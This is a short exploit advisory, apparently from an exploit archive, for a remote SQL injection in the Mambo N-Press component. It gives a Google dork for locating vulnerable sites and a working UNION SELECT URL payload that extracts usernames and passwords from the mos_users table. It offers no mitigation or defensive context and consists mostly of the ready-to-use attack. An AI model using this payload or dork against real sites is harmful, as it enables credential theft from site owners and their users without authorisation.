The Mambo N-Press component suffers from a remote SQL injection vulnerability.
3f7d934aa36100d91e813a2a7ea810916df314607d4c5794818f331406ba335c
------------------------------------------------------------------------------------------------------
# Exploit Title: Mambo Component com_n-press SQL Injection Vulnerability
# Google Dork: inurl:index.php?option=com_n-press
# Date: 01/09/2011
# Author: CoBRa_21 (Penetration Tester)
# E-Mail: ghost1lover@hotmail.com
# Software Link: http://www.netvistun.is/
# Tested on: FreeBSD 6.1 (remote host)
------------------------------------------------------------------------------------------------------
Exploit
http://localhost/[PATH]/index.php?option=com_n-press&press=10 union select 0,username,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from mos_users
------------------------------------------------------------------------------------------------------
Thanks E-Banka.Org & Cyber-Warrior.Org
------------------------------------------------------------------------------------------------------